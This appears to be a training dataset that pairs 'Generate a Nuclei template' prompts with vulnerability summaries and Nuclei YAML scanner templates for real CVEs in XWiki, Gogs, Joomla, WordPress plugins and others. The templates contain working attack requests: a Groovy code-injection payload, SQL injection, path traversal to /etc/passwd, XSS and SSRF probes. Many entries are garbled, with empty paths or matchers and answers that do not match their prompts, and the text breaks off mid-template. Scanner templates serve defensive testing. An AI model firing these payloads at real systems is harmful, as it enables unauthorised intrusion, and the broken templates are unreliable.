Summary: XWiki Platform is a generic wiki platform. Starting in version 2.4-milestone-1 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, XWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or user of a closed wiki as the database search is by default accessible for all users. This impacts the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1. As a workaround, one may manually apply the patch to the page `Main.DatabaseSearch`. Alternatively, unless database search is explicitly used by users, this page can be deleted as this is not the default search interface of XWiki.
Vulnerability Type: Vulnerability (CWE-95)
Severity: critical
Affected Products: xwiki xwiki
Indicators: error, vulnerability detected
|
id: CVE-2024-31982
info:
name: XWiki < 4.10.20 - Remote code execution
author: ritikchaddha
severity: critical
description: XWiki Platform is a generic wiki platform. Starting in version 2.4-milestone-1 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, XWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or user of a closed wiki as the database search is by default accessible for all users. This impacts the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1. As a workaround, one may manually apply the patch to the page `Main.DatabaseSearch`. Alternatively, unless database search is explicitly used by users, this page can be deleted as this is not the default search interface of XWiki.
tags: cve,cve2024,xwiki,rce,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20"
- "{{BaseURL}}/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20"
matchers:
- type: dsl
condition: and
|
cve
|
critical
|
CVE-2024-31982
|
Generate a Nuclei template for CVE-2023-6065
|
Title: Unknown Vulnerability in quttera quttera_web_malware_scanner
Summary: The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code
Vulnerability Type: Unknown Vulnerability
Severity: medium
Affected Products: quttera quttera_web_malware_scanner
Indicators: error, vulnerability detected
|
id: CVE-2023-6065
info:
name: Quttera Web Malware Scanner <= 3.4.1.48 - Sensitive Data Exposure
author: s4e-io
severity: medium
description: The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code
tags: cve,cve2023,wp-plugin,quttera,wpscan,wordpress,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/quttera-web-malware-scanner/quttera_wp_report.txt"
matchers:
- type: word
words:
- "Website Malware Scan Report"
- "Scanned Website"
- "Scan type"
part: body
condition: and
- type: word
words:
- "text/plain"
part: header
- type: status
status:
- 200
|
cve
|
medium
|
CVE-2023-6065
|
Generate a Nuclei template for CVE-2017-14524
|
Title: Vulnerability (CWE-601) in opentext documentum_administrator and others
Summary: Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a (1) URL in the startat parameter to xda/help/en/default.htm or (2) /%09/ (slash encoded horizontal tab slash) followed by a domain in the redirectUrl parameter to xda/component/virtuallinkconnect.
Vulnerability Type: Vulnerability (CWE-601)
Severity: medium
Affected Products: opentext documentum_administrator, opentext documentum_webtop
Indicators: error, vulnerability detected
|
id: CVE-2017-14524
info:
name: OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect
author: 0x_Akoko
severity: medium
description: OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
tags: cve2017,cve,redirect,opentext,seclists,vuln
http:
- method: GET
path:
- "{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me"
matchers:
- type: regex
part: header
|
cve
|
medium
|
CVE-2017-14524
|
Generate a Nuclei template for CVE-2009-2100
|
Title: Path Traversal in joomlapraise com_projectfork
Summary: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
Vulnerability Type: Path Traversal
Severity: medium
Affected Products: joomlapraise com_projectfork
Indicators: error, vulnerability detected
|
id: CVE-2009-2100
info:
name: Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion
author: daffainfo
severity: medium
description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.
tags: cve2009,cve,joomla,lfi,edb,vuln
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd"
matchers:
- type: regex
- type: status
status:
- 200
|
cve
|
medium
|
CVE-2009-2100
|
Generate a Nuclei template for: Hongfan OA ioFileExport.aspx - Arbitrary File Read
|
Title: Hongfan OA ioFileExport.aspx - Arbitrary File Read
Summary: Hongfan OA ioFileExport.aspx - Arbitrary File Read. Arbitrary File Read vulnerability in the Hongfan OA ioFileExport.aspx file, through which an attacker can obtain sensitive server information
Vulnerability Type: Security Check
Severity: medium
Indicators: vulnerability detected
|
id: hongfan-ioffice-lfi
info:
name: Hongfan OA ioFileExport.aspx - Arbitrary File Read
author: SleepingBag945
severity: medium
description: Arbitrary File Read vulnerability in the Hongfan OA ioFileExport.aspx file, through which an attacker can obtain sensitive server information
tags: hongfan,lfi,vuln
http:
- method: GET
path:
- "{{BaseURL}}/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&filename={{filename}}.txt&ContentType=application/octet-stream"
matchers:
- type: dsl
condition: and
|
generic
|
medium
|
hongfan-ioffice-lfi
|
Generate a Nuclei template for: Gradle Develocity Build Cache Node Login Panel - Detect
|
Title: Gradle Develocity Build Cache Node Login Panel - Detect
Summary: Gradle Develocity Build Cache Node Login Panel - Detect. Gradle Develocity Build Cache Node login panel was detected.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: gradle-develocity-panel
info:
name: Gradle Develocity Build Cache Node Login Panel - Detect
author: righettod
severity: info
description: Gradle Develocity Build Cache Node login panel was detected.
tags: panel,gradle,detect,login,discovery
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
condition: and
|
generic
|
info
|
gradle-develocity-panel
|
Generate a Nuclei template for CVE-2018-19207
|
Title: Vulnerability (CWE-425) in van-ons wp-gdpr-compliance
Summary: The Van Ons WP GDPR Compliance (aka wp-gdpr-compliance) plugin before 1.4.3 for WordPress allows remote attackers to execute arbitrary code because $wpdb->prepare() input is mishandled, as exploited in the wild in November 2018.
Vulnerability Type: Vulnerability (CWE-425)
Severity: critical
Affected Products: van-ons wp-gdpr-compliance
Indicators: error, vulnerability detected
|
id: CVE-2018-19207
info:
name: WP GDPR Compliance < 1.4.3 - Unauthenticated Call Any Action or Update Any Option
author: iamnoooob,pdresearch
severity: critical
description: The WP GDPR Compliance plugin allows unauthenticated users to execute any action and update any database value. This vulnerability is due to the lack of proper validation in the Includes/Ajax.php file.
tags: cve,cve2018,wordpress,wp-plugin,wp-gdpr-compliance,rce,vkev,vuln
http:
- method: GET
path:
matchers:
- type: status
status:
- 200
- method: GET
path:
matchers:
- type: word
words:
- ""message":"""
- ""error":"""
part: body_2
condition: and
- type: word
words:
- "application/json"
part: content_type_2
|
cve
|
critical
|
CVE-2018-19207
|
Generate a Nuclei template for: Generic Blind XXE
|
Title: Generic Blind XXE
Summary: Generic Blind XXE. This template detects Generic Blind XXE.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: generic-blind-xxe
info:
name: Generic Blind XXE
author: geeknik
severity: high
description: This template detects Generic Blind XXE.
tags: xxe,generic,blind,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- "http"
part: interactsh_protocol
|
generic
|
high
|
generic-blind-xxe
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: couchsurfing
info:
name: Couchsurfing User Name Information - Detect
author: philippedelteil
severity: info
description: Couchsurfing user name information check was conducted. This OSINT template looks for information about a user name in Couchsurfing.CouchSurfing is a hospitality exchange service by which users can request free short-term homestays or interact with other people who are interested in travel.
tags: osint,osint-social,couchsurfing,discovery
http:
- method: GET
path:
- "https://www.couchsurfing.com/people/{{user}}"
matchers:
- type: word
words:
- "is on Couchsurfing!"
- "profile_page"
part: body
condition: and
- type: status
status:
- 200
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for CVE-2010-1954
|
Title: Path Traversal in joomlacomponent.inetlanka com_multiroot
Summary: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information.
Vulnerability Type: Path Traversal
Severity: high
Affected Products: joomlacomponent.inetlanka com_multiroot
Indicators: error, vulnerability detected
|
id: CVE-2010-1954
info:
name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
tags: cve,cve2010,edb,joomla,lfi,joomlacomponent.inetlanka,vuln
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"
matchers:
- type: regex
- type: status
status:
- 200
|
cve
|
high
|
CVE-2010-1954
|
Generate a Nuclei template for CVE-2010-1714
|
Title: Path Traversal in dev.pucit.edu.pk com_arcadegames
Summary: Directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
Vulnerability Type: Path Traversal
Severity: medium
Affected Products: dev.pucit.edu.pk com_arcadegames
Indicators: error, vulnerability detected
|
id: CVE-2010-1714
info:
name: Joomla! Component Arcade Games 1.0 - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
tags: cve2010,cve,joomla,lfi,edb,packetstorm,dev.pucit.edu.pk,vuln
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"
matchers:
- type: regex
- type: status
status:
- 200
|
cve
|
medium
|
CVE-2010-1714
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: jeuxvideo
info:
name: Jeuxvideo User Name Information - Detect
author: dwisiswant0
severity: info
description: Jeuxvideo user name information check was conducted.
tags: osint,osint-gaming,jeuxvideo,discovery
http:
- method: GET
path:
- "https://www.jeuxvideo.com/profil/{{user}}?mode=infos"
matchers:
- type: status
status:
- 200
- type: word
words:
- "- jeuxvideo.com"
part: body
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for CVE-2017-11586
|
Title: Vulnerability (CWE-601) in finecms finecms
Summary: dayrui FineCms 5.0.9 has URL Redirector Abuse via the url parameter in a sync action, related to controllers/Weixin.php.
Vulnerability Type: Vulnerability (CWE-601)
Severity: medium
Affected Products: finecms finecms
Indicators: error, vulnerability detected
|
id: CVE-2017-11586
info:
name: FineCMS <5.0.9 - Open Redirect
author: 0x_Akoko
severity: medium
description: FineCMS 5.0.9 contains an open redirect vulnerability via the url parameter in a sync action. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
tags: cve,cve2017,redirect,finecms,vuln
http:
- method: GET
path:
matchers:
- type: regex
part: header
|
cve
|
medium
|
CVE-2017-11586
|
Generate a Nuclei template for: Pure-FTPd Service - Detect
|
Title: Pure-FTPd Service - Detect
Summary: Pure-FTPd Service - Detect. Pure-FTPd FTP service was detected.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: pure-ftpd-detect
info:
name: Pure-FTPd Service - Detect
author: pussycat0x
severity: info
description: Pure-FTPd FTP service was detected.
tags: network,ftp,pure-ftpd,detect,tcp,discovery
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
info
|
pure-ftpd-detect
|
Generate a Nuclei template for CVE-2022-39960
|
Title: Missing Authorization in netic group_export
Summary: The Netic Group Export add-on before 1.0.3 for Atlassian Jira does not perform authorization checks. This might allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI.
Vulnerability Type: Missing Authorization
Severity: medium
Affected Products: netic group_export
Indicators: error, vulnerability detected
|
id: CVE-2022-39960
info:
name: Jira Netic Group Export <1.0.3 - Missing Authorization
author: For3stCo1d
severity: medium
description: Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
tags: cve,cve2022,atlassian,jira,netic,unauth,vkev,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- ""jiraGroupObjects""
- ""groupName""
part: body
condition: and
- type: word
words:
- "attachment"
- "jira-group-export"
part: header
condition: and
- type: status
status:
- 200
|
cve
|
medium
|
CVE-2022-39960
|
Generate a Nuclei template for: Red Hat Enterprise Linux Test Page
|
Title: Red Hat Enterprise Linux Test Page
Summary: Red Hat Enterprise Linux Test Page. Tags: tech, redhat, discovery
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: default-redhat-test-page
info:
name: Red Hat Enterprise Linux Test Page
author: dhiyaneshDk
severity: info
description: Red Hat Enterprise Linux Test Page
tags: tech,redhat,discovery
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "<title>Test Page for the Apache HTTP Server on Red Hat Enterprise Linux</title>"
part: body
|
generic
|
info
|
default-redhat-test-page
|
Generate a Nuclei template for CVE-2022-0591
|
Title: Vulnerability (CWE-918) in subtlewebinc formcraft3
Summary: The FormCraft WordPress plugin before 3.8.28 does not validate the URL parameter in the formcraft3_get AJAX action, leading to SSRF issues exploitable by unauthenticated users
Vulnerability Type: Vulnerability (CWE-918)
Severity: critical
Affected Products: subtlewebinc formcraft3
Indicators: error, vulnerability detected
|
id: CVE-2022-0591
info:
name: Formcraft3 <3.8.28 - Server-Side Request Forgery
author: Akincibor,j4vaovo
severity: critical
description: Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.
tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "/wp-content/plugins/formcraft3/"
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}"
matchers:
- type: word
words:
- "http"
part: interactsh_protocol
- type: word
words:
- "User-Agent: WordPress"
part: interactsh_request
|
cve
|
critical
|
CVE-2022-0591
|
Generate a Nuclei template for CVE-2019-15713
|
Title: Cross-Site Scripting (XSS) in my_calendar_project my_calendar
Summary: The my-calendar plugin before 3.1.10 for WordPress has XSS.
Vulnerability Type: Cross-Site Scripting (XSS)
Severity: medium
Affected Products: my_calendar_project my_calendar
Indicators: error, vulnerability detected
|
id: CVE-2019-15713
info:
name: WordPress My Calendar <= 3.1.9 - Cross-Site Scripting
author: daffainfo,dhiyaneshDk
severity: medium
description: WordPress plugin My Calendar <= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site.
tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,my_calendar_project,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- "My Calendar"
- "Tags:"
condition: and
- method: GET
path:
- "{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200
|
cve
|
medium
|
CVE-2019-15713
|
Generate a Nuclei template for: zm-system-log-detect
|
Title: zm-system-log-detect
Summary: zm-system-log-detect. Zm system log file exposed.. Tags: logs, zm, exposure
Vulnerability Type: Security Check
Severity: low
Indicators: vulnerability detected
|
id: zm-system-log-detect
info:
name: zm-system-log-detect
author: pussycat0x
severity: low
description: Zm system log file exposed.
tags: logs,zm,exposure,discovery
http:
- method: GET
path:
- "{{BaseURL}}/?view=log"
- "{{BaseURL}}/zm/?view=log"
matchers:
- type: word
words:
- "<title>ZM - System Log</title>"
- type: status
status:
- 200
|
generic
|
low
|
zm-system-log-detect
|
Generate a Nuclei template to detect Improper Neutralization of Script-Related HTML Tags in a Web Page
|
Title: Improper Neutralization of Script-Related HTML Tags in a Web Page (CWE-80)
Summary: The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as "<", ">", and "&" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.
Vulnerability Type: Improper Neutralization of Script-Related HTML Tags in a Web Page
Severity: medium
Indicators: vulnerability detected, error
|
id: calameo-publications-xss
info:
name: WordPress Manage Calameo Publications 1.1.0 - Cross-Site Scripting
author: DhiyaneshDK
severity: medium
description: WordPress Manage Calameo Publications 1.1.0 is vulnerable to reflected cross-site scripting via thickbox_content.php and the attachment_id parameter.
tags: wordpress,wp-plugin,xss,wp,wpscan,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/athlon-manage-calameo-publications/thickbox_content.php?attachment_id=id%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%26"
matchers:
- type: word
words:
- "ath_upload_calameo_publication(id\"><script>alert(document.domain)</script>&)"
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200
|
cwe
|
medium
|
CWE-80
|
Generate a Nuclei template for CVE-2019-7255
|
Title: Cross-Site Scripting (XSS) in nortekcontrol linear_emerge_essential_firmware and others
Summary: Linear eMerge E3-Series devices allow XSS.
Vulnerability Type: Cross-Site Scripting (XSS)
Severity: medium
Affected Products: nortekcontrol linear_emerge_essential_firmware, nortekcontrol linear_emerge_elite_firmware
Indicators: error, vulnerability detected
|
id: CVE-2019-7255
info:
name: Linear eMerge E3 - Cross-Site Scripting
author: arafatansari
severity: medium
description: Linear eMerge E3-Series devices are vulnerable to cross-site scripting via the 'layout' parameter.
tags: cve,cve2019,emerge,xss,packetstorm,nortek,nortekcontrol,vuln
http:
- method: GET
path:
- "{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers:
- type: word
words:
- "Template : <script>alert(document.domain)</script>"
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200
|
cve
|
medium
|
CVE-2019-7255
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: rg-uac-panel
info:
name: Ruijie RG-UAC Login Panel - Detect
author: princechaddha
severity: info
description: Ruijie RG-UAC login panel was detected.
tags: panel,ruijie,router,firewall,discovery
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "dkey_check.php"
- "get_dkey_passwd"
part: body
condition: and
- type: status
status:
- 200
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template to detect Server-Side Request Forgery
|
Title: Server-Side Request Forgery (CWE-918)
Summary: The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
Vulnerability Type: Server-Side Request Forgery
Severity: high
Indicators: vulnerability detected, error
|
id: umbraco-base-ssrf
info:
name: Umbraco 8.14.1 - baseUrl Server-Side Request Forgery (SSRF)
author: dhiyaneshDk
severity: medium
description: Umbraco 8.1.4.1 allows attackers to use the baseUrl parameter to several programs to perform a server-side request forgery (SSRF) attack.
tags: oast,edb,ssrf,umbraco,vuln
http:
- method: GET
path:
- "{{BaseURL}}/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=http://{{interactsh-url}}"
- "{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=http://{{interactsh-url}}/"
- "{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=http://{{interactsh-url}}/"
matchers:
- type: word
words:
- "http"
part: interactsh_protocol
- type: dsl
|
cwe
|
high
|
CWE-918
|
Generate a Nuclei template for CVE-2021-44260
|
Title: Vulnerability (CWE-306) in wavlink wl-wn531g3_firmware
Summary: A vulnerability is in the 'live_mfg.html' page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information of the manager of router.
Vulnerability Type: Vulnerability (CWE-306)
Severity: high
Affected Products: wavlink wl-wn531g3_firmware
Indicators: error, vulnerability detected
|
id: CVE-2021-44260
info:
name: WAVLINK AC1200 - Information Disclosure
author: ritikchaddha
severity: high
description: A vulnerability is in the 'live_mfg.html' page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information of the manager of router.
tags: cve,cve2022,wavlink,exposure,ac1200,vuln
http:
- method: GET
path:
- "{{BaseURL}}/live_mfg.html"
matchers:
- type: dsl
condition: and
|
cve
|
high
|
CVE-2021-44260
|
Generate a Nuclei template for: Wazuh - Default Login
|
Title: Wazuh - Default Login
Summary: Wazuh - Default Login. Wazuh contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: wazuh-default-login
info:
name: Wazuh - Default Login
author: theamanrawat,denandz,PulseSecurity.co.nz
severity: high
description: Wazuh contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
tags: wazuh,default-login,vuln
http:
- method: GET
path:
- "{{BaseURL}}/app/login"
matchers:
- type: status
status:
- 200
- method: GET
path:
matchers:
- type: word
words:
- ""username":"
- ""roles":"
part: body
condition: and
- type: word
words:
- "application/json"
part: header
condition: and
- type: status
status:
- 200
|
generic
|
high
|
wazuh-default-login
|
Generate a Nuclei template for CVE-2021-43510
|
Title: SQL Injection in simple_client_management_system_project simple_client_management_system
Summary: SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the username field in login.php.
Vulnerability Type: SQL Injection
Severity: critical
Affected Products: simple_client_management_system_project simple_client_management_system
Indicators: error, vulnerability detected
|
id: CVE-2021-43510
info:
name: Sourcecodester Simple Client Management System 1.0 - SQL Injection
author: edoardottt
severity: critical
description: Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
tags: cve2021,cve,simpleclientmanagement,sqli,auth-bypass,simple_client_management_system_project,vuln
http:
- method: GET
path:
matchers:
- type: dsl
condition: and
|
cve
|
critical
|
CVE-2021-43510
|
Generate a Nuclei template for: Kubelet Stats
|
Title: Kubelet Stats
Summary: Kubelet Stats. Scans for kubelet stats. Tags: tech, k8s, kubernetes
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: kubelet-stats
info:
name: Kubelet Stats
author: sharath
severity: info
description: Scans for kubelet stats
tags: tech,k8s,kubernetes,devops,kubelet,discovery
http:
- method: GET
path:
- "{{BaseURL}}/stats/summary"
matchers:
- type: status
status:
- 200
- type: word
words:
- ""node":"
- ""nodeName":"
part: body
condition: and
|
generic
|
info
|
kubelet-stats
|
Generate a Nuclei template for CVE-2020-17505
|
Title: OS Command Injection in articatech web_proxy
Summary: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.
Vulnerability Type: OS Command Injection
Severity: high
Affected Products: articatech web_proxy
Indicators: error, vulnerability detected
|
id: artica-web-proxy-workflow
info:
name: Artica Web Proxy Security Checks
author: dwisiswant0,pdteam
severity: info
description: A simple workflow that runs all Artica Web Proxy related nuclei templates on a given target.
tags: unknown
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
cve
|
high
|
CVE-2020-17505
|
Generate a Nuclei template for CVE-2014-8682
|
Title: SQL Injection in gogits gogs
Summary: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
Vulnerability Type: SQL Injection
Severity: high
Affected Products: gogits gogs
Indicators: error, vulnerability detected
|
id: CVE-2014-8682
info:
name: Gogs (Go Git Service) - SQL Injection
author: dhiyaneshDK,daffainfo
severity: high
description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
tags: cve2014,cve,gogs,seclists,packetstorm,edb,sqli,gogits,vuln
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27"
matchers:
- type: word
words:
- ""ok":true"
- ""data""
- ""repolink":""
part: body
condition: and
- type: status
status:
- 200
|
cve
|
high
|
CVE-2014-8682
|
Generate a Nuclei template for CVE-2018-16836
|
Title: Path Traversal in rubedo_project rubedo
Summary: Rubedo through 3.4.0 contains a Directory Traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI.
Vulnerability Type: Path Traversal
Severity: critical
Affected Products: rubedo_project rubedo
Indicators: error, vulnerability detected
|
id: CVE-2018-16836
info:
name: Rubedo CMS <=3.4.0 - Directory Traversal
author: 0x_Akoko
severity: critical
description: Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI.
tags: cve2018,cve,rubedo,lfi,edb,rubedo_project,vkev,vuln
http:
- method: GET
path:
